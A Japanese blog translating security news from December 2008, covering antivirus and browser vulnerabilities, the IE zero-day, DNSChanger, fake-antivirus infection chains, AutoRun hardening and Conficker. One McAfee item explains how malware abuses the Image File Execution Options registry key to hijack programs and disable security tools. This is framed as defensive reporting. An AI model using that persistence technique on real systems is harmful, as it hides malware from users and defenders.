セキュリティ情報‥


このページは、以下のサイトの和訳を中心として、セキュリティ関連のニュースを発信していくことにします。

Archive
2007まで 

    セキュリティ・メーカー関連
  • ・ F-Secure Weblog : News from the Lab
  • ・ Kaspersky Lab Weblog
  • ・ McAfee Avert Labs Blog
  • ・ WEBSENCE Security Labs : Threat Blog
  • マスメディア
  • ・ Washingtonpost "Security Fix"
  • 情報サイト等
  • ・ Secunia "Security Watchdog" Blog
  • ・ Zeroday Emergency Response Team
  • ・ PhishTank

幾つかのウィルススキャナに脆弱性
heiseSecurity : Security (2008/12/22)

 SecuniaとIVIZ Technoはウィルススキャナ中の脆弱性レポートを公開した。Trend MicroのオンラインスキャナHouse Call中のActiveXコントロールの脆弱性は、攻撃者がPCを感染させることができ、犠牲者を悪意あるサイトに訪問させれば事足りる。この問題は、House Call 6.51.0.1028と6.6.0.1278中に発見された。ユーザはHousecall_ActiveX.dllを削除しなければならない。次に、HouseCallのサイトを訪問し、バージョン6.6.0.1285をインストールしなければならない。

ESET Smart SuiteのWindows版中のドライバ epfw.sys は、攻撃者がIOCTLリクエストを使用することでシステム権限を取得することが可能なフローがあった。ESETのアップデートはこの問題を修正している。

 AVGのLinux版は、コード注入による脆弱性攻撃に潜在的に使用できるUPXでパックされたファイルを構文解析したとき問題が発生する。この問題はAVGのLinux版 7.5.51に存在する。そして現在、修正はリリースされていない。
 BitDefenderのLinux版は、NeoliteやASProtect圧縮ツールで圧縮してある破損したPEバイナリを解析した時、 短整数(integer)型オーバーフローが発生し、リモートコードの実行を許可した。このケースでは、BitDefenderは7.6.0825以降のバージョンでこの問題は修正されている。

Sophos SAVScan 4.33.0のLinux版でさえ、特定の圧縮ツール(Armadillo, ASProtect, asprotectSKE)でパックされたファイルとCABアーカイブで問題が存在していた。しかし、今迄これらはクラッシュが発生するために監視されていただけだった。CABファイルでの問題は解決されているが、圧縮されたファイルの問題の修正は公開されていない。
 Avast WorkstationのLinux版 v1.0.8(試用版)中にも深刻なセキュリティホールが存在しているが、後継バージョンの(現在ダウンロード可能)1.2.0で、この問題は解決されている。

Firefox 2.0.20
heiseSecurity : Security (2008/12/20)

 Firefox 2.0.19のWindowsバージョンがリリースされた後、新バージョンFirefox 2.0.20がリリースされた。影響があるのはWindowsバージョンのみの「専属エラー」であるにもかかわらず、明らかにバージョン番号の同期を取るため、全てのプラットフォーム用にリリースされた。
 Mozilla開発者は、ユーザがFirefox 3.0にアップデートするよう推奨し続けている。Firefox 2.0.20と2.0.19はFirefox 2用にリリースされる最後のセキュリティアップデートである。このアップデートは手動でもダウンロードできれば、Firefoxの自動アップデート機能を使用して入手することもできる。

FirefoxとOperaがパッチをリリース
F-Secure Weblog : News from the Lab (2008/12/18)

 昨日のInternet Explorerのアップデートで正に取り乱しているかも知れないが、適用しなければならない他のブラウザのアップデートがある。
 Mozilla FirefoxとOperaにパッチしなければならない脆弱性が存在していた。

 上の画像の脆弱性レポートは、Firefox 3.xとFirefox 2.xに関するものである。

 Opera 9.xの脆弱性に関する我々のレポートはこちら参照。

*******************************
【関連情報】
Linkのみの提供です(訳しませんが)、Firefox 2.Xのアップデートが終わるようです。
WashingtonPost "Securuty Fix"から、
Posted at 09:15 PM ET, 12/17/2008
Firefox 2 Users Will Get No More Security Updates

Microsoft定例外の緊急パッチをリリースする予定
heiseSecurity : Security (2008/12/16)

 Microsoftは、Internet Explorerの深刻なセキュリティホールのパッチを明日(米国時間、17日水曜日)リリースするとアナウンスした(日本語情報は脚注参照)。このアナウンスはリリースの時間を指定していない。これはこのパッチが多分夕方にリリースされるだろうと推測される(Microsoftの所在地Redmondは世界標準時に8時間遅れる)。
 これは月例パッチ(毎月第二火曜日にリリースされる)とは別に、定例外でリリースされる最初のものではない。10月に、Microsoftはワームによって活発に脆弱性を突かれたRPCサービス中のセキュリティホールに関する緊急のパッチを提供した。
 今回のIEのセキュリティホールもまた活発にこの脆弱性を突かれることになった深刻な問題であった。このセキュリティホールは12月の月例パッチの日(毎月第二火曜)の一週間前に公開された。それ以前に、この脆弱性に焦点を当てた攻撃は主に中国でターゲットにされていた。一方、数多くのWebサーバーが、訪問者のコンピュータにSQLインジェクションを通して、この脆弱性を攻撃するために改竄され続けた。これは明らかにMicrosoftが即座に対応しなければならないことを発生させた。
 このアナウンスは他の二つの重大な問題が、今年の終わりまでにパッチされるか否かに言及していない。Microsoftによれば、Wordpadのセキュリティホールは既に攻撃が始まっている。そして、MicrosoftのSQLサーバーもまた、パッチされていない問題を持っていることを明らかにしている。

***************************
 今回の定例外の緊急パッチに関するMicrosoftの日本語情報は以下を参照してください。

********************************************************************
マイクロソフト セキュリティ情報の事前通知 - 2008 年 12 月 (定例外)
公開日: 2008 年 12 月 17 日
********************************************************************
これはマイクロソフトが 2008 年 12 月 18 日に緊急リリースを予定しているセキュリティ情報の事前通知です。

「マイクロソフト セキュリティ情報の事前通知 - 2008 年 12 月 (定例外)」の全情報は、 以下をご覧ください。

http://www.microsoft.com/japan/technet/security/bulletin/ms08-dec-ans.mspx

認識せよ!ーInternet Explorerのセキュリティ ホールは大変危険
F-Secure Weblog : News from the Lab (2008/12/15)

 Zero-day攻撃は、パッチされていないIE脆弱性を活発にターゲットにしている。
 Microsoftは最近、Security Advisory 961051 to include all versions of Internet Explorer(Internet Explorer の脆弱性により、リモートでコードが実行される。公開日: 2008年12月11日 | 最終更新日: 2008年12月16日)を拡張している。この脆弱性は本質的にIE7にだけ影響があると考えられていた。
 見ての通り、今やこの脆弱性が関連付けられるソフトウェアは長大な物となっている(【訳注】日本語で読みたい方は、上記リンクのページの「概要」参照)。

 Microsoftのアドバイザリ中には、幾許か脆弱性を軽減させるかもしれない数多くの(相等に扱い難い)解決策がある。

 更に悪いニュース。SQLインジェクション攻撃は、この脆弱性を突く攻撃をホストするために、正当なWebサイトをハックするために使用されている(信頼されているサイトを悪意ある攻撃をホストするサイトに変化させる)
 Security FixeWeek.comで更なる詳細を読むことができる。

 eWeek宣伝部の誰かが、あなたに何かを伝えようとしている(【訳注】上の画像のトップの広告。IEを他のブラウザに変更するよう伝えているようです。現在は、別の広告になっています)。

Google Chromeパスワード セキュリティ テストで最下位に
heiseSecurity : Security (2008/12/14)

 Richard Chapinによれば、Google Chromeはパスワード マネージメント セキュリティのテストで最下位となった。しかし、他のブラウザも大したことはなかった。このセキュリティの専門家は二年前Firefox 2のパスワード マネージメント中にセキュリティ フローのあることを発見した。彼はベータの期間のGoogle Chromeをテストした。Chapinの会社(Chapin Information Services (CIS))はリリース時点で修正されていない三つのバグを報告した。Chapinは、Chromeパスワードマネージャ中の17の他の問題点は「広範な危険性に合体できる潜在的脆弱性の毒物」を作成したと発言している。
 Windows用Safari 3.2はCISのテストに追加された。そして、Chromeと共に「本質的に最悪のパスワードマネージャ」にランクされた。CISのテストは、ブラウザがそのユーザに推奨しているパスワード情報を騙されてギブアップしないことを保証するための21の特定のチェックを実行した。詐欺師はブラウザを欺き、サードパーティーサイト用のユーザ名とパスワードを露見させるために、この様なフローを攻撃する。
 興味あることは、Google Chromeは、あるテスト(Autocomplete=Off Prevents Form Fills. オートコンプリートをOFFに設定していた時に、フォームを埋めることを防止する)に合格した唯一つのメジャーなブラウザだったが、これはスコアを2(Safariと同じ値)にアップしただけだった。「勝者」はOpera 9.62(21のテスト中7つに合格した)。CISはテスト スイーツを持っている。これはCISのテストに対して、ユーザが彼ら自身のブラウザを評価することを可能にする。

InternetExplorerの全てのバージョンに巨大なセキュリティホール
WashingtonPost : Security Fix (2008/12/12)

 この水曜日、Security FixはIE7中に新たなセキュリティホールが発見されたことを読者に警告した。私はこれを再びポストする。なぜなら、Microsoftは今、このフローはサポートされているIEの全てのバージョンに影響があると発言しているからである。さらに、セキュリティエキスパートが、巨大な数のサイトが、この脆弱性を利用して脆弱性あるシステムにマルウェアをインストールするために改竄され続けていると警告しているからである。
 SANS Internet Storm Centerは、ハッカーが正当なWebサイトに侵入し、IEを使用して、そのようなサイトを訪問したユーザのマシン上に、データを盗むためのソフトウェアをインストールできるコードをアップロードしていると報告している。SANSの最高技術責任者Johannes Ullrichは、この脆弱性を攻撃するための種を播かれたサイトが数千に昇ると見積もっている。
 例えば、Webセキュリティ会社Websenseは、アタッカーがABIT(エイビット、多くのホームコンピュータ用のマザーボードメーカー)の中国のWebサイトを改竄したと報告している。今迄、この脆弱性はオンラインゲーム証明書を盗むためだけに存在していたようであった。しかし、SANS等はアタッカーがこの脆弱性を近日中により巧みに使用してくるだろうと警告している。
 Microsoftの改訂されたセキュリティアドバイザリによれば、このフローはIE5からIE8 Beta 2に至る、今日使用されているIEの全てのバージョンに存在する。Microsoftのアドバイザリはこの脆弱性からの脅威を軽減する多くの回避策を含んでいる。Microsoftの回避策の幾つかはWindows Vistaシステム上で試したとき動作しなかった。あるいは、動作させるために、アドバイザリ中で言及されていないチョッとした工夫を必要とした。
 例えば、IEのメニューからツール>インターネットオプション>詳細設定と進み「オンラインからの攻撃の緩和に役立てるため、メモリ保護を有効にする」オプションをチェックすることで、この機能を有効にするように推奨している。しかしながら、Vista上のIE7で変更を試みたとき、私のマシンでは、このオプションはグレイアウトしていた。この変更を行うためには、一旦IEを完全に終了させ、次にIEのアイコンを右クリックし、「アドミニストレータとして起動」を選択した後に、この設定変更を行わなければならなかった。
 Micrososftはまた、IEのインターネットとローカルセキュリティ設定を「高」に設定するよう示唆している。Microsoftの指示通り設定変更は問題ないが、[筆者のマシンは]アクティブスクリプト(多くのWebサイトで使用されている機能)を無効化しているために、幾つかのサイト以外はIE中で適切に動作しなかった。
 更に、Microsoftはユーザが脆弱性あるコンポーネント("oledb32.dll")を取り消すことで、このフローからの脅威を軽減できると発言している。これを実行するためには、アドミニストレータとしてコマンドプロンプトを起動し、以下のコマンドをカット アンド ペーストするか、タイプする必要がある。

    Regsvr32.exe /u "Program Files\Common Files\System\Ole DB\oledb32.dll"

 これは私のVistaマシンでは「このアクションを実行することはできない」とするエラーメッセージ、を発生させた。このコマンドはWindowsXPではキチンと動作した。
 私はIE以外のWebブラウザに変更することを考慮するようWindowsユーザに忠告する。少なくともMicrosoftが、この脆弱性の修正パッチを提供するまでは。
 この状況を誇大に騒ぎ立てることを私は意図していない。しかし、私たちが再三再四見てきたように、アタッカーは通常IE中のフローを素早く利用してくる。これは、IEが世界中のコンピュータのほぼ80%のデフォルトブラウザであるためである。そして、アンチウィルスプログラムは、この種の攻撃からあなたを保護するための頼りにはならない。幾つかのハックされたサイトが発生させた脆弱性攻撃に関するスキャンは悲惨な結果であった。VirusTotal.comは、このマルウェアのスキャンに使用された32のアンチウィルスのうち4つだけが、悪意ある/疑わしい物として検出したと報告している。

**********************************

【訳注】VirusTotalの報告から。この脆弱性を悪意あるものとして検出するアンチウィルスは以下です。

左から順に、製品名、バージョン、最新アップデート日時、悪意あるソフトウェア

AntiVir、 7.9.0.43、 2008.12.10、 TR/Crypt.XPACK.Gen
eSafe、 7.0.17.0、 2008.12.10、 Suspicious File
Prevx1、 V2、 2008.12.11、 Malicious Software
VBA32、 3.12.8.10、 2008.12.11、 suspected of Malware-Cryptor.Win32.General.3

イメージファイル実行オプション
McAfee Avert Labs : Blog (2008/12/09)

 マルウェアの製作者は、彼らの悪意あるコードをシステムの起動時に稼働させるための特別な方法を見つけることを続けている。
 そのような方法の一つが、この殆ど知られていないレジストリキー(HKey_Local_Machine\Software\Microsoft\Windows NT\CurrentVersion\Image ファイル実行オプション)である。
 このレジストリキーは、アプリケーションが開始されたとき、そのアプリケーションをデバッグするため、デバッガの名前(この場合は、Olly Debugger)を指定するために使用される。
 例えば、notepad.exe(【訳注】メモ帳)が開始されたとき、これをデバッグするためには、このレジストリキーに行き、notepad.exeと呼ばれるサブキーを作成しなければならない。次に、文字列値がこのサブキー用に作成され、名前"debugger"が割り当てられる。そして、値が与えられる。Ollyデバッガの場合、以下の図のように見える:

 これは今、メモ帳が呼び出されるたびに、Ollyデバッガがその代わりに動作することが保証される。そして、それは、次に、ノートパッドを起動する。そして、メモ帳がデバッグされるのを可能にする。
 ここに、このレジストリキーに関する一つの解釈がある:
 我々がデバッグ アプリケーション(この場合、Ollyデバッガ)を悪意ある実行ファイル(例えば、 trojan.exe)に置き換えたなら、制御はメモ帳を起動する度に、trojan.exeにリダイレクトされる。
 Microsoftは、このレジストリキーを有用な機能にする予定だった。しかしながら、実際に、Windowsは、制御がリダイレクトされているアプリケーションがインチキなアプリケーションであるか否かチェックできるメカニズムを持っていない。
 私は、このスタートアップ手法に関する情報を何とか発見した。それは2005年に遡る。残念ながら、マルウェアの作者はこの大変な機能を利用し続けている:

1. 疑いを持っていないユーザーが、別のクリーンなアプリケーションを実行していることを意図している場合でさえ、悪意あるファイルをスタートアップする。
2. セキュリティ製品のプロセスを悪意あるプロセスにリダイレクトすることによって、セキュリティ製品を無効化する。

 スタートアップ エントリをチェックすることを意図するmsconfig.exeのようなツールは、これを操作する装備が不十分なので、このリダイレクト技術を使用するアプリケーションを検出できない。ユーザは代わりにSysinternalの”Autoruns”を使用するようアドバイスされている。
 以下のスクリーンショットを参照:

 関連した話では、たまたまアンチウイルスソリューションのない、もしくは最新でないシグネチャを持っている深刻に感染したマシンで次に戦う時、前記したテクニックを使用することで、悪意があるプロセスをクリーンなファイルにリダイレクトすることができる。
 例えば、“trojan.exe”を“clean.exe”にリダイレクトできる。以下を参照。

 次回、悪意あるプロセスが自身を実行しようとした時、クリーンなファイルが代わりに実行される。この様にして、悪意あるファイルの産卵を妨げることができる。いつもながら、これを実行する前にあなたのレジストリをバックアップすることを思い出してください。

マルウェアの破壊工作、悪の進化
Washingtonpost : Security Fix (2008/12/08)

 セキュリティエキスパートは、一台の感染したコンピュータを近隣のシステムからデータを盗む交通手段にする、悪意あるソフトウェア中の厄介な進化に気をつけるようインターネットユーザに警告している。これは、オペレーティングシステムやセキュリティソフトの如何に関わらず、感染したコンピュータ上で稼働するだろう。
 この進化はマルウェアのDNSChangerファミリーを補完する物(通常、コーデックとして偽装するか、Webベースのビデオをインストールする必要があるとユーザに告げるブラウザ用プラグインとして出現する)として出現した。その名前が示唆しているように、このマルウェアは、感染したシステム上のドメインネーム システム(DNS)サーバ設定を変更する(アタッカーが制御するサーバを経て、犠牲者のWeb検索や他のオンライン活動を効果的な経路にするために)。DNSChangerはMacとWindowsコンピュータにインストール可能である。
 DNSChangerの最新バージョンの追加機能は犠牲者のマシンに、このマルウェア自身のDHCPサーバをインストールすることである。DHCPは"dynamic host control protocol"の頭文字であり、DHCPは有線/無線ルータがネットワーク上のコンピュータのアドレスを割り振るために使用するものである。事実、大抵のラップトップは、それらに割り当てをする、あらゆるローカル ワイアレス ネットワークからインターネットアドレスを自動的に要求するよう設定されている。
 これがなぜ重大事なのか? ホストマシンに対し、それ自身のDHCPを追加することによって、DNSChangerは近隣の無線設備のデバイスにインターネットアドレスを提供することができるようになる。
 McAfeeのCraig Schmugarは以下のシナリオでこのマルウェアの脅威を分析している。

    ・ Jillは、お気に入りのコーヒーショップで、感染したWindowsラップトップから無料のWiFiポイントを使用している。
    ・ Steveは隣のテーブルに座っていて、彼のラップトップを起動している。ここで彼のラップトップは、そのワイアレス ローカルエリア ネットワーク越しにIPアドレスを要求する。
    ・ JillのPCは、DHCPが注入されているので、そのコマンドで欺くためのDNSサーバを経て、全てのDNSリクエストを送るようSteveのコンピュータに指示する。
    ・ SteveがWebブラウザを起動する。そして、お気に入りのソーシャル ネットワーク サイトに進む。しかし、そのブラウザが正しいURL名を表示しているにもかかわらず、実際には欺くためのDNSサーバが、そのブラウザを他のサイトに向かわせている。

 Symantecは、これをTrojan.Flush.Mの変種としている。McAfeeは、この機能が未だDNSChangerファミリー中に広く実装されているようには見えないと発言している。しかし、この状況は間もなく変わるだろうと予測される。DNSChangerで注意することは、今日、最も多産の圧力をかけてくるマルウェアの一つであるということだ。更に重要なことは、一台の感染したシステムが潜在的にローカル ネットワーク上の数百の他のシステムにインパクトを与えることができることである。

Javaをアップデートしましょうか?
Washingtonpost : Security Fix (2008/12/03)

 Sun Microsystemsは、Javaソフトウェアのセキュリティアップデートをリリースした。サイバー犯罪者がJavaの脆弱性をターゲットにした歴史があるので(少なくとも、8億のコンピュータユーザが同じバージョンのJavaをインストールしている理由から)、多くの読者はこのプログラムをアップデートする時期である。
 Sunのリリースノートは幾許かの詳細を明らかにしており、「Sun Java 6.0 Update 11は、一つもしくは複数の脆弱性の修正を含んでいる」と発言している。あなたがJavaの最新版をインストールしているか否かが定かでないのであれば、このリンクでチェックすることができる。
 WindowsユーザはWindowsのコントロールパネルのJavaアイコンをクリックし、「アップデート」タブの「直ぐにアップデート」を開くことで最新のバージョンを入手できる。アップデートプロセスの開始後、Yahoo!ツールバーをインストールしないように注意しなさい。インストールの残りのプロセスに進む前に、このオプションをアンチェックする必要がある。他のOSのユーザは、このリンクに従うことでアップデートを見つけることができる。
 Java 6を使用中であり、最も最新のバージョン(Java 6 Update 10)をインストールしているのであれば、Sunの新しい"patch in place"(【訳注】アップデートをインストールし、以前のバージョンを削除する)メカニズムが宣伝通りに動作することに注意すべきである。これはJavaの以前のバージョンを手動でアンインストールする必要がないことを意味している。Update 11は、テストマシンにインストール後、Update 10をきちんと削除した。しかし、認識していてほしいことは、この機能がUpdate 10以前のバージョンを削除することはないということである。
 もちろん、アップデートされたJavaを維持する代替方法の一つは、あなたのシステムから手動で古いバージョンを単に削除することである。私は数ヶ月に渡り、何の後悔もなく、またこのプログラムを見掛け上も必要とせず、Windows Vistaシステム上でJavaなしに毎日を送っていることを報告できることに幸せを感じる。
 Javaをインストールし、上手に使用することを望む読者のために、私はSecuniaのSoftware Inspectorサービスを勧める。このソフトウェアは、アップデートする必要があるプログラムを掌握しているので、Windowsユーザのプログラム アップデートを支援する。ユーザはSecuniaのWebサイトか、Personal Software Inspectorをインストールすることでスキャンを実行できる。Secuniaの本日のブログへのポストによれば、このソフトウェアの支援を受けている大多数のユーザでさえ、少なくとも一つ前の、もしくは危険なサードパーティーのプログラムを稼働している。Secuniaは、Personal Software Inspectorを稼働している20,000PCのうち、未だプログラムアップデートを適用していないユーザが98%いることを発見している。

悪意あるプログラムのチームによって稼働されているインチキ警告ツアー
McAfee Avert Labs : Blog(2008/12/04)

 「シートベルトをお締めください、只今から最近インターネットを徘徊しているインチキ警告を出すトロイの木馬ツアーに出発致します。このツアーが立ち寄る様々なマルウェア駅で、インチキのアンチウィルスアプリケーションによって、お客様のシステムは感染させられるかもしれません。」 以下がマシンを感染させるマルウェアによって実装されている手法の事例である。
 以下が旅行プラン。

    ステーション1 : マルウェアをホストしている悪意あるWebページ
    ステーション2 : ブラウザ ヘルパー オブジェクト
    ステーション3 : インチキのアンチウィルス アプリケーション ダウンローダー
    目的地 : インチキのアンチウィルス アプリケーションに感染させられたシステム

 この小旅行はマルウェアをホストしている悪意あるWebページから始まる。ユーザはE-Mailやインスタントメッセンジャーのリンクや、改竄された正当なWebサイトからのリダイレクトのようなソーシャルエンジニアリング技術を経由して悪意あるWebページに到達する。この様なリンクをクリックすることが感染の始まりである。
 悪意あるホスティングWebページを訪問中に、ユーザはシステム上に実行ファイルをダウンロードさせるためのフォーム中で「チケットを購入」する。これは、あるソーシャルエンジニアリング技術を通して行われる。
 ツアー用の一例を上げる:
    http://best[伏せます]tube.net

 ユーザが上のページを訪問すると同時に、彼らはwmcodec_update.exe(Windowsメディアプレイヤー用コーデック プラグインを装っている)をダウンロードするように求めてくる。メッセージボックスがポップアップしてくる。これはユーザがインチキのプラグインファイル(このファイルは、Multi Dropperマルウェアである)をダウンロードするまで繰り返される。
 実行と同時に、ダウンロードされたファイルは、以下のようなインチキのエラーメッセージをポップアップする:

 このマルウェアは実行を継続し、以下をドロップする:

    ブラウザ ヘルパー オブジェクト
    インチキのアンチウィルス アプリケーション ダウンローダー

 この小旅行の、次のステーション(ブラウザ ヘルパー オブジェクト)に移動する。この駅で生贄のブラウザは改竄される。例えば、ユーザの検索結果は巧みに取り扱われ、別の悪意あるWebページへのリンクを含むようにされる。以下の二つの画像は、クリーンな検索結果とブラウザ ヘルパー オブジェクトによって悪意あるWebページへのリンクを注入された後の検索結果との相違である。私はある悪意あるサイトを強調しておく。以下の二つの画像中に5つの違いを見つけてほしい。

 悪意あるURLの注入前の検索結果:

 悪意あるURLを注入された後の改竄されたブラウザによる検索結果:

 多くのスパイウェアは、ユーザのオンラインサーフィンの習慣を捕獲するためにブラウザ ヘルパー オブジェクトを使用する。この情報は例えば、検索キーワードに関連するポップアップ広告を作成するためにマルウェアの製作者によって後日使用される。
 ツアーの次の駅はインチキ アンチウィルス ダウンローダである。ここでユーザはデスクトップ上に二つの雑誌(どちらもポルノサイトへリンクしている)を見ることになる。 

 このインチキ アプリケーションは「インチキの」ダウンローダによってユーザに気付かれることなくダウンロードされる。最終的にユーザのシステムは、インチキのアプリケーションで感染させられる。
 この時点で、ユーザはインチキ アプリケーションによる偽の警告を表示される。

 インチキのアプリケーションによって発生させられたこのレポートを見ると、このレポートが大げさでインチキであることが露になる。

 このインチキ マルウェアは偽造した警告を表示する。これはインチキで大げさな脅威からシステムを「修復」するために彼らの製品を購入するようユーザを誘惑するためである。


 インチキ警告のツアーを楽しんでいただけただろうか? 今日、マルウェアはコンピュータに感染するために、しばしばチームとして仕事する。このツアーで、我々は悪意あるWebページがホストしているマルウェア(Multi Dropper、ブラウザヘルパーオブジェクト、ダウンローダ)と、インチキ警告が共通のゴールを目指していることを見てきた。
 いつも通り、我々はそのメッセージボックスを閉じるチャンスを絶対与えないように繰り返してくるインチキのプラグインのダウンロードに対する予防措置を取るようアドバイスする。タスクマネージャを使用して偽造したメッセージを表示してくるプロセスを殺すことを試しなさい。E-Mail中のリンクに注意しなさい。匿名のメールとインスタントメッセージ中のリンクについては殊に。常に「安全なWebサーフィン」を心掛けなさい。これがあなたのコンピュータをクリーンに維持する第一段階だから。

Windows XP/VistaのAutoPlay/AutoRunを無効化する方法
The PC Informant : News (2008/12/02)

 以前の記事の続き、私はポータブルメディアの自動起動を無効化する方法について書く予定である。感染させられたUSBドライブは、最近多くのマルウェア発生の源泉になっていることに注意してほしい。
 最初に、Microsoftの言葉の使い方の紛らわしさを整理し、いくつかの用語について説明する。ポータブルメディアという言葉がCDを意味していた頃、Windows95以降のOSで、AutoRunと呼ばれる機能が搭載された。この機能は、autorun.infと呼ばれる小さなファイルを含む全てのCD(後には、全てのDVDも)が、CDドライブに挿入された時、自動的に起動を開始するものであった。この機能はある目的には便利であったが、CDに含まれているマルウェアが、ユーザに気付かれることなく感染することも可能であった。WindowsXPで、AutoPlayと呼ばれる別の機能が追加された。この機能はUSBドライブのようなリムーバルメディアが差し込まれた時、ダイアログボックスをポップアップした。このダイアログボックスは、あなたがどの様なアクションを取りたいのかを尋ね、様々な設定を可能にした。多くの人々は自動アクションを許可することを選択した。安全な手続きのためには、いかなる物も自動起動させてはならない。以下に自動アクションを無効化する手順を示す。AutoRun機能は未だにCD/DVDドライブ用に存在しているが、無効化もできることに注意してほしい(残念ながら、Microsoftは既にインストールされているソフトウェアをレジストリ エントリから自動で開始するための参照に未だに”autorun”という用語を使用している。更に混乱に拍車を掛けているのが、大変有用なユーティリティにAutorunsと名づけたことである)。

 WindowsXPで、AutoPlay用の設定を最も簡単に取り扱うには、TweakUIというフリーのユーティリティを使用することである。私は以前の記事でこのツールについて論議している。そこで、以前発言したことを繰り返しておく。

     あなたがAutoPlayを永遠に無効化したいのであれば、TweakUIを使用しなさい。TweakUIを開始し"マイコンピュータ"の下のエントリを伸長し、"AutoPlay"をクリックする。次に、"ドライブ"を選択しAutoPlayを無効化したいドライブレターをアンチェックする。

 あなたがレジストリを調整したいのであれば、私が以前記したように、CD/DVDドライブに対応するAutoRunエントリを編集することが可能である。 

     あなたが経験豊かなPCユーザであれば、AutoRunはレジストリを編集することで永遠に無効化することができる。Regeditを開き、HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDRom キーに進む。"AutoRun"の値を発見し、その値を0に設定する。この操作を試し編集する前に、レジストリのバックアップを取るようにしなさい。このレジストリ編集の副作用は、Windowsが光学ディスクを認識する前に新しい光学ディスクを挿入すると、マイコンピュータ中のビューをリフレッシュしなければならないことである。

 更にWindowsXPプロフェッショナル(Homeエディションでは利用できない)で利用可能なもう一つの方法は、グループ ポリシー エディタ(GPE)を使用することである。GPEの基本事項は私の Computer Educationサイトで論議されている。簡潔に、GPEでAutoPlayを設定する詳細は以下である。

    1/
     スタート>ファイル名を指定して起動、と進み“gpedit.msc”(引用符不要)と入力しOKボタンを押し、グループ ポリシー エディタを開く。
    2/
     左ペインで、“Administrative Templates”をクリックする。Local Computer (全員)もしくはカレントユーザでの設定変更ができるようになった。
    3/
     副見出しの“System”を選択する。
    4/
     右ペインで、“Turn off AutoPlay”エントリをダブルクリックする。
    5/
     開いたダイアログボックスで、“Enable”ラヂオボタンをクリックする。
    6/
     “Turn off AutoPlay on:”のラベルのついたドロップダウン メニューで“All drives”を選択する。

 VistaでGPEを使用することもできるが、より良い方法はVistaコントロールパネルを通して実行することである。

    1/
     スタート メニューからコントロールパネルを開く。
    2/
     “Hardware and Sound”カテゴリを選択する。
    3/
     “AutoPlay”を選択する。
    4/
     “Use AutoPlay for all media and devices”エントリの傍にあるチェックを外す。

CBS(アメリカのTVネットワーク)がハックされた
The PC Informant : News (2008/12/01)

 詳細はInfoWorldのレポート参照。

 セキュリティ会社の報告によれば、TVネットワークCBSは、マルウェアをホストするために使用されたWebサイトとして、最も新しいビッグネームになった。ロシアのマルウェア配布者が、cbs.comサイトのサブドメイン上で別のiFrame攻撃の実行を可能にしたので、いかなる訪問者にもマルウェアをリモートで送れるようになっていたことが明かになった。このサイトのハックによって起動されたマルウェア攻撃に対するユーザの脆弱性は、幾つかのファクター(PC上で使用されているセキュリティのタイプ、OS、場合によってはブラウザのバージョン)に依存する。

Apple アンチウィルス ソフトウェアの利用を推奨
heiseSecurity : Security (2008/12/01)

 Appleは、こっそりリリースしたTech Note中で、今回初めて公にアンチウィルスソフトウェアの利用を推奨していた。この簡潔なドキュメントにおいて、Appleはウィルス製作者をより困難にするために、様々なアンチウィルスソリューションの幅広い使用をユーザに指示している。
 次に、このTech Noteは三つのオプション、Intego VirusBarrier X5、Symantec Norton Anti-Virus 11 for Macintosh、McAfee VirusScan for Mac(【訳注】Appleの日本語サイトでは、Norton Anti-Virus for Macintosh(旧 SAM、Symantec AntiVirus for Macintosh)と、McAfeeのVirex の二つだけです)をリストしている。ClamXav(GPLのMac OS X GUIポートはClamAvを認可している)がリストから漏れている。これはAppleは資格を有してはいるが、公開されたリストでは推薦も支持もしないということである。
 アンチウィルスソフト利用の推奨は、Macプラットフォーム上でウィルス性の感染を今迄目撃していない若干のMac OS Xユーザにはショックであるかもしれない。しかしながら、人によっては石橋をたたいて渡るアプローチはセキュリティにとって最良の実践である。そして、Macシステム上にインストールされるアンチウィルスソフトウェアの多様性は、潜在的なウィルス性の発症の取扱いを手助けすることになるだろう。

アップデート(2008/12/03)
 この記事を書いた後に、Appleは問題のTech Noteを削除した。Bill Evans(Appleスポークスマン)は「我々はKnowledgeBaseの記事を削除した。これは古く、不正確であったためである。Macは細かい設定なしに、悪意あるソフトウェアとセキュリティ上の脅威に対する防御をビルトインのテクノロジとして提供している」と発言し、更に「あらゆる脅威から100%影響を受けないシステムは存在しないので、アンチウィルスソフトウェアを稼働することは更なる防御になるだろう」とも発言している。

Adobe Acrobat 9のパスワードはバージョン8よりクラックし易いか?
heiseSecurity : Security (2008/11/28)

 パスワード復旧ソフトのメーカーElcomsoft(ロシア)は、大変容易にパスワードを復旧させる機能を持つAdobe Acrobat 9で使用されているパスワード認証システム中に、弱点があることを発見したと主張している。Advanced PDF Password Recovery (APDFPR)バージョン5に関する記述によれば、この弱点のために、管理者はネットワーク上にある暗号化されたAdobe 9ファイルのパスワードを、以前のバージョンより100倍も速く、復旧することが可能であった。
 Adobeは、長時間に渡るBrute Forceと辞書攻撃(【訳注】Brute Force:総当たり攻撃の意味。パスワードを取得するために辞書ツールを用い、あらゆる組み合わせから暗号文の一部でも復号できるか試みる攻撃手法)を妨げるために認証システムを使用していた。このようなシステムはMD5でパスワードを一度だけハッシュ(【訳注】文字列などの与えられたデータを値(固定長の疑似乱数)に変換する操作)するのではなく、数回ハッシュすることで、クラックしているコンピュータの処理時間を長くさせるものだった。この方法はMS-Office 2007のようなアプリケーションで成功裏に使用されていた。AdobeはAcrobat 5以来Acrobatの全てのバージョンで、この方法を実装してきたにもかかわらず、Elcomsoftは、バージョン9で実装されたパスワード保護システムは、異なっているとする情報を、我々heiseSecurityに与えた。
 Adobe 9.0はSHA-256アルゴリズム(128ビットMD5より安全と考えられている)を使用している。しかし、パスワード認証メカニズムは大変脆弱なので、8文字で構成されるパスワードでさえ全く安全ではない。より長いビット長でも、以前のバージョン(Acrobat 8)で可能であったセキュリティのレベルに至っていない。

Windowsワーム感染、加速
heiseSecurity : Security (2008/11/27)

 Microsoftは、システムに侵入するためにサーバーサービスのRPC機能中の既知の脆弱性を攻撃する新たなWindowsワームの拡散の増加を注視している真っ最中である。Conficker.Aワームの感染率は、特に会社のネットワーク上で加速度的に増加していると報告されている。Microsoft Malware Protection Centerは、大多数の報告はアメリカからのものであるが、ヨーロッパ・アジア・南アメリカの顧客もまた感染している。また、報告は数百のホームユーザからも送られてきていると発言している。
